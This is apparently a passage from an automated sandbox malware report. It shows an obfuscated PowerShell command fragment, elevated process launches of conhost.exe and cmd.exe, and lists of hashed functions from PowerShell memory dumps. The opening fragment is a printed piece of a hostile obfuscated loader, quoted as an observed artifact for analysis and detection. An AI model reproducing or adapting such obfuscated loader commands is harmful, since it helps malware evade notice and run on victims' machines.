gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;"
                                                                            Imagebase:0x7ff7b2bb0000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:10
                                                                            Start time:04:39:28
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff620390000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:11
                                                                            Start time:04:39:30
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
                                                                            Imagebase:0x7ff74bc40000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Executed Functions

                                                                              Function 00007FF7C0F02026 Relevance: .5, Instructions: 501COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1609664942.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9c75462d0f3cc6a3b4c8b9d62afed5260f8bc43d5c4d93dee81e86eb69ec7853
                                                                              • Instruction ID: bbb4a5564a143fb2355601aa929207f73c9ecf1266c433233caed0ae02bec082
                                                                              • Opcode Fuzzy Hash: 9c75462d0f3cc6a3b4c8b9d62afed5260f8bc43d5c4d93dee81e86eb69ec7853
                                                                              • Instruction Fuzzy Hash: E7E11732E0DB864FE396AB285855274BBD1FF56324F8901FBC549C7293DA18BC4583A2
                                                                              Function 00007FF7C0F04BE5 Relevance: .4, Instructions: 438COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1609664942.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3bc088c5b34f2dbf1f3c7405815e65d81cee699f04727a85f1c0c1affccb9a9b
                                                                              • Instruction ID: 3328a18969f11000885691802e9780095df641e97854ed23be5d90052261ef84
                                                                              • Opcode Fuzzy Hash: 3bc088c5b34f2dbf1f3c7405815e65d81cee699f04727a85f1c0c1affccb9a9b
                                                                              • Instruction Fuzzy Hash: 7BD14AB1A0EA894FE755EF2888555B9BBE1FF06364B5401FEC08DC7293DA18BC45C3A1
                                                                              Function 00007FF7C0F021C4 Relevance: .1, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1609664942.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2601b05bdd0dce5a3055d3f8fc4cea59de8b7b9af0ae9d8e54ac3cfb64c073d3
                                                                              • Instruction ID: 00ac2b39ef645bf366dea50eda4f4b08f41a0eb46caa4ba8742bb17f64d4ecc1
                                                                              • Opcode Fuzzy Hash: 2601b05bdd0dce5a3055d3f8fc4cea59de8b7b9af0ae9d8e54ac3cfb64c073d3
                                                                              • Instruction Fuzzy Hash: 1721F732E0DA4A4FF3D5AB285845274A3C2FF45364FD901BAC10CC7393DE19BC8546A1
                                                                              Function 00007FF7C0E33BB5 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1609184003.00007FF7C0E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7c0e30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 481980cb38a17d3372d01da5eba76b74cf78a48a197ab9434a6ea1a31d540f70
                                                                              • Instruction ID: 220aabdae5291cceb07e77127e857073bbadf5ffd87d1b56840d3d6b90d7c3c2
                                                                              • Opcode Fuzzy Hash: 481980cb38a17d3372d01da5eba76b74cf78a48a197ab9434a6ea1a31d540f70
                                                                              • Instruction Fuzzy Hash: B801A73010CB0C4FD744EF0CE491AA5B7E0FB95360F10052DE58AC3651D736E882CB41

                                                                              Executed Functions

                                                                              Function 00007FF7C0F0313A Relevance: .4, Instructions: 423COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.1435622959.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7d5528757939fb7ce9f3fa7a1c1186f9a15c4b4dcb2436e8d587f742ec90da10
                                                                              • Instruction ID: 70b5c88523ce368696ddf074b6f2f4138ad29551905e7a8b7610dcfb3deda7d2
                                                                              • Opcode Fuzzy Hash: 7d5528757939fb7ce9f3fa7a1c1186f9a15c4b4dcb2436e8d587f742ec90da10
                                                                              • Instruction Fuzzy Hash: 1BD14631A0DA894FE795EF2888956B9BBA5FF06324F4401FED04DC7293DE58B845C3A1
                                                                              Function 00007FF7C0F0317A Relevance: .2, Instructions: 247COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.1435622959.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ab68faf6fd0d54ab82c2d98736d0abff806a76ad3200e1a66bd4a09ecc9e7bfe
                                                                              • Instruction ID: 9209d406a4e94cf207ee2c82f97cd3b8e917bfb7bd678e8820b20dc69a800329
                                                                              • Opcode Fuzzy Hash: ab68faf6fd0d54ab82c2d98736d0abff806a76ad3200e1a66bd4a09ecc9e7bfe
                                                                              • Instruction Fuzzy Hash: 48810321E0DA864FE799EF284495278BB95FF05724B9900FEC04DCB293DE55BC8583A1
                                                                              Function 00007FF7C0E333B5 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.1435313661.00007FF7C0E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_7ff7c0e30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction ID: 7724e511bd31ea15bc0f7caf8b47e0b4994d264237c09fa034e1856b7e005404
                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction Fuzzy Hash: 6701677115CB0C4FD744EF0CE491AA5B7E0FB95364F50056DE58AC3651DB36E882CB45

                                                                              Executed Functions

                                                                              Function 00007FF7C0F06609 Relevance: .5, Instructions: 471COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2663703385.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eb560d1584a645d9f24f5b1abc5b0a0a91a6a1d593be454dfea354a470669e9d
                                                                              • Instruction ID: b2d74c30baa1b806ba8d49f47458ba01f0f2f64ae00a136b158cdea49f260ba5
                                                                              • Opcode Fuzzy Hash: eb560d1584a645d9f24f5b1abc5b0a0a91a6a1d593be454dfea354a470669e9d
                                                                              • Instruction Fuzzy Hash: A2E11B3190DA8A4FE755EF2888556BCBBE1FF46328F9401BAD04DC7293DF28A845C751
                                                                              Function 00007FF7C0F091FA Relevance: .4, Instructions: 435COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2663703385.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f44332d834e040709348115db7c38b75e7513367beb6c25481e1bd627eccda48
                                                                              • Instruction ID: 9a3838a77ccec6ba5cf18368840cb5ea0adab014c16598015150a7ad9405a68d
                                                                              • Opcode Fuzzy Hash: f44332d834e040709348115db7c38b75e7513367beb6c25481e1bd627eccda48
                                                                              • Instruction Fuzzy Hash: 6FD1583190DA8A4FE795EB2848555B9BBE1FF16324F4801FED04DC72D3EA14B846C3A1
                                                                              Function 00007FF7C0E34A62 Relevance: .4, Instructions: 387COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2663066124.00007FF7C0E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ff7c0e30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f62ed39d6d648b54a7e3f3a6e102bd68207bd5de41f912504fa5baae8584cd83
                                                                              • Instruction ID: e4b3c509811ce243e4e5920883fee3e5db4be065b8e8e772ee106a5ec9b42d22
                                                                              • Opcode Fuzzy Hash: f62ed39d6d648b54a7e3f3a6e102bd68207bd5de41f912504fa5baae8584cd83
                                                                              • Instruction Fuzzy Hash: 24C15D71A08A4D8FDB84EF58D495AE9BBE1FF98310F54426AD409D7296CB34F881CBD0
                                                                              Function 00007FF7C0E344C0 Relevance: .4, Instructions: 372COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2663066124.00007FF7C0E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ff7c0e30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 03b3bc77ab36b4b0d8a3df81dc0c606ad8ce80cbe921aed575faaa34309e60a0
                                                                              • Instruction ID: 91983dc8ce0544d4092f49bdc10fc145af37b0ecfe12951d09124b55977deb89
                                                                              • Opcode Fuzzy Hash: 03b3bc77ab36b4b0d8a3df81dc0c606ad8ce80cbe921aed575faaa34309e60a0
                                                                              • Instruction Fuzzy Hash: 33B13522A0D6950FD301BB6DECA52E57FA0DF523B5B0941BBD1C8CB293DD18784A87A1
                                                                              Function 00007FF7C0F06A1B Relevance: .2, Instructions: 166COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2663703385.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 91556f4edea40280b5fc2f7491d94807eb850250f132e8c32f986daa0e46662e
                                                                              • Instruction ID: ad3403a74a2dece67cc89b2fcc1fdde1df9abbbd36738f1cb25368e891e885c8
                                                                              • Opcode Fuzzy Hash: 91556f4edea40280b5fc2f7491d94807eb850250f132e8c32f986daa0e46662e
                                                                              • Instruction Fuzzy Hash: 0851C6A590E7C55FD353AB780865264BFA4FF07228B4944EFD0C9CB1E3DA1C6856C362
                                                                              Function 00007FF7C0F067A7 Relevance: .2, Instructions: 150COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2663703385.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 664fab7ec32bcf00857d914833c8361cafc70ad02a1d8c749ba354ded3e36c6a
                                                                              • Instruction ID: 6e6b46f05e1bacdfa0b638f9828c1bb4c3bd2f0adb6d17f5746239e36c0feea5
                                                                              • Opcode Fuzzy Hash: 664fab7ec32bcf00857d914833c8361cafc70ad02a1d8c749ba354ded3e36c6a
                                                                              • Instruction Fuzzy Hash: A351963291DA8A4FF395AB2848542BCB6D6FF45368FD901B9D00DC7293DE29BC848751
                                                                              Function 00007FF7C0F03890 Relevance: .1, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2663703385.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0236990865bb8a123702aea550decaca95d68f3c3e9f9523f64a624fe4295063
                                                                              • Instruction ID: 2752191e728959a7bed38b2dd298d3b004e7bd263cc2c5d03f095f04b5af9f86
                                                                              • Opcode Fuzzy Hash: 0236990865bb8a123702aea550decaca95d68f3c3e9f9523f64a624fe4295063
                                                                              • Instruction Fuzzy Hash: 1B31F722E0DA474FE6A4AE1858D1278E6D6FF84774F9842BAD40DC72C2DF98BC844691
                                                                              Function 00007FF7C0E33535 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2663066124.00007FF7C0E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ff7c0e30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction ID: ed6c82286f2d2954162bd8bf9d870e9bb07b2d81ed7dda1794b2662ffa6e5ca7
                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction Fuzzy Hash: 7A01677115CB0C4FD748EF0CE491AA5B7E0FB95364F50056DE58AC3651DB36E881CB45